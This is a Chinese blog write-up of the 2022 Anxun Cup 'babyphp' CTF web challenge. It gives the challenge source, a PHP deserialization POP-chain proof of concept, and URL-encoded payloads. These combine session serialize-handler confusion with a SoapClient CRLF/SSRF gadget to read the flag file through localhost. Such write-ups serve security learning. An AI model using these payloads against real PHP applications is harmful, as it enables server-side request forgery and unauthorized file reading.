2022安洵杯babyphp

最新推荐文章于 2022-11-30 15:01:12 发布
最新推荐文章于 2022-11-30 15:01:12 发布
阅读量1k 收藏
点赞数
分类专栏: WP 文章标签: php 开发语言 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61778128/article/details/128088773
版权

这个题没打出来有点可惜,感觉做的都差不多了,不过有些地方确实没理解,还是理解不到位

先来看序列化,这个序列化是不难的,不过有一个小坑,我们先理一遍顺序

array(0) { } <?php
//something in flag.php

class A
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = "babyhacker";
    }

    public function __invoke()
    {
        if (isset($this->a) && $this->a == md5($this->a)) {
            $this->b->uwant();
        }
    }
}

class B
{
    public $a;
    public $b;
    public $k;

    function __destruct()
    {
        $this->b = $this->k;
        die($this->a);
    }
}

class C
{
    public $a;
    public $c;

    public function __toString()
    {
        $cc = $this->c;
        return $cc();
    }
    public function uwant()
    {
        if ($this->a == "phpinfo") {
            phpinfo();
        } else {
            call_user_func(array(reset($_SESSION), $this->a));
        }
    }
}


if (isset($_GET['d0g3'])) {
    ini_set($_GET['baby'], $_GET['d0g3']);
    session_start();
    $_SESSION['sess'] = $_POST['sess'];
}
else{
    session_start();
    if (isset($_POST["pop"])) {
        unserialize($_POST["pop"]);
    }
}
var_dump($_SESSION);
highlight_file(__FILE__);

flag.php

<?php
session_start();
highlight_file(__FILE__);
//flag在根目录下
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
    $f1ag=implode(array(new $_GET['a']($_GET['b'])));
    $_SESSION["F1AG"]= $f1ag;
}else{
   echo "only localhost!!";
}
only localhost!!

这里最后肯定要调用C类的uwant函数,可以由A类的__invoke()方法触发,

A类的__invoke()方法由C类的__toString()方法触发,这里有一个小坑,我当时一直以为这个tostring是A类的 $this->a = "babyhacker";触发的,结果一直没跑通,后来看没用到B类,尝试用B的die($this->a);,没想到是可以的

那这样链子就出来了

Poc

<?php
highlight_file(__FILE__);
error_reporting(0);
class A
{
    public $a;
    public $b;

    public function __construct($a,$b)
    {
        $this->a=$a;
        $this->b=$b;
    }

    public function __wakeup()
    {
        $this->a = "babyhacker";
        echo '触发了A类的 __wakeup';
    }

    public function __invoke()
    {echo '触发了A类的 __invoke';
        if (isset($this->a) && $this->a == md5($this->a)) {
            $this->b->uwant();
        }
    }
}

class B
{
    public $a;
    public $b;
    public $k;
    public function __construct($a,$b,$k)
    {
        $this->a=$a;
        $this->b=$b;
        $this->k=$k;
    }

    function __destruct()
    {
        $this->b = $this->k;
        die($this->a);
    }
}

class C
{
    public $a;
    public $c;

    public function __construct($a,$c)
    {
        $this->a=$a;
        $this->c=$c;
    }

    public function __toString()
    {
        echo '触发了C类的 __toString';
        $cc = $this->c;
        return $cc();
        
    }
    public function uwant()
    {
        if ($this->a == "phpinfo") {
            phpinfo();
        } else {
            call_user_func(array(reset($_SESSION), $this->a));
        }
    }
}

$a=new B(new C('',new A('0e215962017',new C('phpinfo',''))),'','');
echo (serialize($a));

Payload

这里记得绕过wakup

pop=O%3A1%3A%22B%22%3A3%3A%7Bs%3A1%3A%22a%22%3BO%3A1%3A%22C%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A0%3A%22%22%3Bs%3A1%3A%22c%22%3BO%3A1%3A%22A%22%3A3%3A%7Bs%3A1%3A%22a%22%3Bs%3A11%3A%220e215962017%22%3Bs%3A1%3A%22b%22%3BO%3A1%3A%22C%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A7%3A%22phpinfo%22%3Bs%3A1%3A%22c%22%3Bs%3A0%3A%22%22%3B%7D%7D%7Ds%3A1%3A%22b%22%3Bs%3A0%3A%22%22%3Bs%3A1%3A%22k%22%3Bs%3A0%3A%22%22%3B%7D

 

接下来就是想 call_user_func(array(reset($_SESSION), $this->a));的利用了

call_user_func函数中的参数可以是一个数组,数组中第一个元素为类名,第二个元素为类方法

reset的话会把指针指向$_SESSION数组的第一个键值对

感觉这里是不是在考php原生类读文件呢?

PHP利用原生类进行SSRF攻击

https://blog.csdn.net/weixin_44033675/article/details/116903866

还是先叙述一下这个攻击手法:

SoapClient是php的一个内置类,它本身是存在CRLF和SSRF漏洞的,怎么说呢?这个类可以控制发送请求包,并且headers可控,不仅可控,还可以传入回车+换行(\r\n),那么被回车下去的请求头不就成了post数据。所以我们可以任意构造请求包,另外,当这个类被调用它没有的方法,会触发它的call,引发SSRF漏洞

<?php
$target = 'http://127.0.0.1:5555/path';
$post_string = 'data=something';
$headers = array(
    'X-Forwarded-For: 127.0.0.1',
    'Cookie: PHPSESSID=my_session'
    );
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'      => "aaab"));

$aaa = serialize($b);
$aaa = str_replace('^^',"\r\n",$aaa);
$aaa = str_replace('&','&',$aaa);
echo $aaa;

$c = unserialize($aaa);
$c->not_exists_function();
?>

session反序列化漏洞:

<?php
session_start();
$_SESSION['name'] = '1234567';
?>

session是会被反序列化存储到本地的

session.serialize_handler这个参数控制session反序列化的处理器,不同的处理器序列化的结果不一样

session.serialize_handler=php 时,session文件内容为: name|s:7:"1234567";

session.serialize_handler=php_serialize 时,session文件为: a:1:{s:4:"name";s:7:"1234567";}

session.serialize_handler=php_binary 时,session文件内容为: 二进制字符names:7:"1234567";

而当session反序列化和序列化时候使用不同引擎的时候,即可触发漏洞

php引擎会以|作为作为key和value的分隔符,我们在传入内容的时候,比如传入

$_SESSION[‘name’] = ‘|username‘

那么使用php_serialize引擎时可以得到序列化内容

a:1:{s:4:”name”;s:4:”|username”;} 

然后用php引擎反序列化时,|被当做分隔符,于是

a:1:{s:4:”name”;s:4:”

被当作key

username被当做vaule进行反序列化

于是,我们只要传入$_SESSION[‘name’] = |序列化内容

即可触发漏洞

SoapClient序列化构造:

<?php
$a = new SoapClient(null,
    array(
        'user_agent' => "aaa\r\nCookie:PHPSESSID=u6ljl69tjrbutbq4i0oeb0m332",  
        'uri' => 'bbb',
        // 'location' => 'http://127.0.0.1/flag.php?a=GlobIterator&b=/*f*' //首先用GlobIterator找flag的名字
        'location' => 'http://127.0.0.1/flag.php?a=SplFileObject&b=file:///f1111llllllaagg'
         
    )
);
$b = serialize($a);
echo urlencode($b);
?>

首先通过ini_set更改session的处理器,传入构造的session序列化字符串

if (isset($_GET['d0g3'])) {
    ini_set($_GET['baby'], $_GET['d0g3']);
    session_start();
    $_SESSION['sess'] = $_POST['sess'];
}
else{
    session_start();
    if (isset($_POST["pop"])) {
        unserialize($_POST["pop"]);
    }
}

Payload

GET: ?baby=session.serialize_handler&d0g3=php_serialize POST: sess=|O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A3%3A%22bbb%22%3Bs%3A8%3A%22location%22%3Bs%3A47%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3Fa%3DGlobIterator%26b%3D%2F%2Af%2A%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A48%3A%22aaa%0D%0ACookie%3APHPSESSID%3Disub76msd2qttd2jh39vhvepak%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D sess=|O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A3%3A%22bbb%22%3Bs%3A8%3A%22location%22%3Bs%3A67%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3Fa%3DSplFileObject%26b%3Dfile%3A%2F%2F%2Ff1111llllllaagg%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A48%3A%22aaa%0D%0ACookie%3APHPSESSID%3Disub76msd2qttd2jh39vhvepak%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

第二次,需要将sess设置为SoapClient这个类,方便第三次利用反序列化pop链中call_user_func激活soap类

Payload

GET ?D0G3 POST sess=SoapClient

第三次,直接用call_user_func激活soap类,通过flag.php将flag写入session

Payload

pop=O%3A1%3A%22B%22%3A3%3A%7Bs%3A1%3A%22a%22%3BO%3A1%3A%22C%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A0%3A%22%22%3Bs%3A1%3A%22c%22%3BO%3A1%3A%22A%22%3A3%3A%7Bs%3A1%3A%22a%22%3Bs%3A11%3A%220e215962017%22%3Bs%3A1%3A%22b%22%3BO%3A1%3A%22C%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A7%3A%22aaa%22%3Bs%3A1%3A%22c%22%3Bs%3A0%3A%22%22%3B%7D%7D%7Ds%3A1%3A%22b%22%3Bs%3A0%3A%22%22%3Bs%3A1%3A%22k%22%3Bs%3A0%3A%22%22%3B%7D

实际上那个第二步可能是不需要的,soap类的序列化字符串已经存入session了,直接传入pop激活soap也是可以的

 

MUNG东隅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
记一道CTF题babyphp之学习代码注入
xiaotaode2012的专栏
08-18 5340
0x00写在前面的话 最近打算刷刷CTF题目,提升一下自身的见识面,这里碰到了一个代码注入的题目特作记录,大牛勿喷。。。 0x01做题的整体思路 做题的地址,http://web.jarvisoj.com:32798/ 打开地址,随机点击发现都是展示对应的界面,做过开发的我,直觉告诉我应该是传入一个字符串展示对应页面,这样我随机点了一下,发现about里面有
DoYouHaoBaby PHP开发框架 v2.5.2.rar
08-30
DoYouHaoBaby(全名:The DoYouHaoBaby PHP Framework)是一个极具美学价值的PHP开发框架,从代码、注释、文 档以及系统工具的用户界面均追求干净、整洁而高效。DoYouHaoBaby 具备了大量丰富的特性: 包括MVC, ActiveRecord, 国际化语言包, 缓存组件, 分布式服务器部署, 领域驱动设计, 模式扩展, 模板引擎,RBAC权限扩展和测试等等。她能够快速地构建一个企业级应用。 程序功能: 1.PHP autoload自动载入 2.多元化的URL模式 3.丰富的数据库查询语言 4.内置Code和Tag两种风格迥异的模板引擎 5.多语言支持 6.分布式数据库特性支持 7.内置常用的缓存机制 8.AJAX支持 9.更多功能等待你的发掘... 安装: 1.将DoYouHaoBaby 2.5 压缩包解压至一个空文件夹。 2.DoYouHaoBaby不需要进行任何特殊的安装,只需要直接部署即可。
2022安洵[babyPHP]看Soap+CLRF造成SSRF漏洞
Aiwin的博客
11-28 2560
Soap+CLRF组合拳造成SSRF漏洞以及例题2022安洵 BabyPHP、[LCTF 2018]bestphp's revenge。
Jarvis OJ babyphp
沐目的博客
10-15 333
源码泄露加任意命令执行 一、知识点: 1. 源码泄露 在一些网站中,可能会用备份文件,我们可以通过一些工具把他给下载下来。 链接:https://pan.baidu.com/s/1s_3Phgww6nAFKVhw-GTDZw 提取码:87ax 2.assert() 这个函数和eva()这个函数差不多,都可以执行命令,也是高危函数。 二、实战: 首先运行那个脚本,好像只能在Linux上跑,运行完后我...
php竞赛,京津冀大学生竞赛:babyphp
weixin_39884738的博客
03-12 200
京津冀大学生竞赛:babyphp比赛的时候没作出来,回来之后一会就作出来了,难受。。。仍是基本功不扎实,都不记得__invoke怎么触发的了php放上源码函数error_reporting(1);class Read {public $var;public function file_get($value){$text = base64_encode(file_get_contents($valu...
babyphp反序列化pop链,字符逃逸)
weixin_43610673的博客
02-28 1712
题目在BBUCTF有复现,但代码里dbuser,dbpass,database有修改https://buuoj.cn/challenges#[GYCTF2020]Easyphp 扫描目录发现www.zip源码泄露,下载审计 在Update.php看到 即登录成功就获取flag 看了下login.php,感觉登录框这里是做不了什么文章了 主要的内容都是在lib.php 根据Update.php里...
Baby PHP - hacklu CTF 2018
stepone4ward的博客
07-13 726
代码审计
2022 安询 Babyphp
最新发布
m0_64815693的博客
11-30 2297
第五届 安询 Babyphp
[2022 CISCN]初赛 web题目复现
cosmoslin的博客
07-04 4066
源码泄露www.zip,用网上的链子直接打 online_crt 考点:CVE-2022-1292SSRF项目后端为python+go,其中python部署在外网,go通过python转发到内网先看python,一共有四个路由:为主界面生成一个x509证书调用c_rehash创建证书链接通过代理访问go内网服务再来看go,有一个admin路由,用以重命名证书文件题目的考点为CVE-2022-1292,是c_rehash的一个命令注入漏洞c_rehash是openssl中的一个用perl编写的脚本工具,用于批
php的控制反转和依赖注入
sinat_38804294的博客
07-04 440
1.判断代码的好处就是高内聚低耦合 高内聚就是软件模块是由相关性很强的代码组成,只负责一项任务,也就是常说的单一责任原则。 低耦合就是每个模块之间耦合度要低,如果要修改,修改一点点就可以而不是修改一大部分。 而在代码中体现出来的设计模式就是依赖注入和控制反转 2.依赖注入: 就是A类所依赖的B类C类等以属性或者构造函数等方式注入A类而不是直接在A类中实例化。 例如: class A { p...
newstar UnserializeOne(一道基础反序列化详解)
qq_55717276的博客
10-23 341
反序列化从后往前推
map序列化和反序列化_php反序列化|无unserialize函数反序列化漏洞
weixin_39926678的博客
12-22 316
传统的php反序列化漏洞必须要两个条件:存在反序列化漏洞的php对象unserialize函数漏洞可控在实际的php程序中,反序列化链(pop链),如thinkphp、Laravel的反序列化链的漏洞偶尔会爆出来但是这样写代码的还是很少的。$data = unserialize($_POST['a']);但是phar文件的出现,给php反序列化漏洞带来了新的攻击面,可以做的无unseri...
Buuctf之web(五)
qq_50589021的博客
12-14 6721
Greatphp 使用 Error/Exception 内置类绕过哈希比较 可见,需要进入eval()执行代码需要先通过上面的if语句: if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ) 这个乍看一眼在ctf的基础题目中非常常见,一般情况下只需要使
极客巅峰 2020 babyphp2(phar反序列化
y0un9er
10-02 725
文章目录前言一、什么是 phar 反序列化1.三个条件2.生成 phar 文件的常见代码题目分析下载源码classes.php生成 phar 文件总结 前言 这题比赛的时候,我一脸懵逼,大佬提示才知道源码泄露。但是之前没做过 phar 反序列化的题,二脸懵逼。还好源码没删,自己搭建了环境,看着大佬们的wp复现一番。点击打开题目 VPS 20年12月10号过期,望见谅。 一、什么是 phar 反序列化 利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息。phar简介 .
2022 ciscn 东北赛区分区赛 部分 wp
qq_23321269的博客
06-19 5834
2022 ciscn 东北分区赛 部分wp
unserialize_pop和requests、re库学习
xiaobai的博客
08-27 1346
反序列化靶场第八关 是一个pop链的关卡 源码: <?php include("./flag8.php"); class a { public $object; public function resolve() { array_walk($this, function ($fn, $prev) { if ($fn[0] === "system" && $prev === "ls") {
md5相关比较
m0_51428325的博客
11-16 1124
弱比较 if($_POST['a']!=$_POST['b']&& md5($_POST['a'])==md5($_POST['b'])){ die("success!"); } 在这样的弱比较里,0e开头的会被识别成科学计数法,结果均为0,比较时0=0为true绕过 payload: a=QNKCDZO&b=s878926199a 常用md5加密后为0的字符串: 240610708,aabg7XSs,aabC9RqS s878926199...
php自动序列化,php序列化函数unserialize对象注入漏洞(也成为pop链漏洞)
weixin_36080939的博客
03-10 317
今天发现主站 https://www.tipsns.com 对应的官方博客http://blog.tipsns.com 居然被别人黑了挂了木马,最后发现了一个非常隐蔽的对象注入漏洞,这里是演示对象注入漏洞的测试程序:class foo{private $file = "test.txt";private $data = "text";public function __destruct(){fil...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MUNG东隅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值